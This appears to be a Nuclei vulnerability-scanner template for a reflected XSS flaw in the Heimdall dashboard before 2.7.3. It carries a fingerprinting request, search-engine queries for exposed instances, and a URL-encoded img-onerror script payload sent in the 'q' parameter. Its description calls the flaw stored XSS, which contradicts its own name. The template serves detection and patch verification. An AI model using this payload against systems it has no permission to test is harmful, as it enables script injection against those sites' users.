id: CVE-2025-54597 info: name: Heimdall Application Dashboard < 2.7.3 - Reflected XSS author: 0x_Akoko severity: medium description: | LinuxServer.io Heimdall < 2.7.3 contains a stored XSS caused by improper sanitization of the \"q\" parameter, letting remote attackers execute scripts, exploit requires crafted input. impact: | Attackers can execute arbitrary scripts in users' browsers, potentially stealing session data or performing actions on behalf of users. remediation: | Update to version 2.7.3 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-54597 - https://github.com/linuxserver/Heimdall/releases/tag/v2.7.3 - https://github.com/linuxserver/Heimdall/commit/6b9f61b0e672c37b807ff338e1a3fdaa8f39a8a6 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2025-54597 epss-score: 0.00565 epss-percentile: 0.43521 cwe-id: CWE-79 metadata: verified: true max-request: 2 vendor: linuxserver product: heimdall shodan-query: title:"Heimdall" fofa-query: app="Heimdall-Application-Dashboard" tags: cve,cve2025,heimdall,xss,reflected,linuxserver,unauth flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "heimdall" - "items/pintoggle" internal: true - raw: - | GET /?q=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word words: - '">' part: body - type: status status: - 200 # digest: 490a0046304402206fd6d4892a9a7e3e0a8b9bc6d99d5785009e7228e0ee60bac1ac3ec171d7a8eb0220568851e21389475aafdf56f48a6d275945cb80537bcfe6a34c796330728117d8:922c64590222798bb761d5b6d8e72950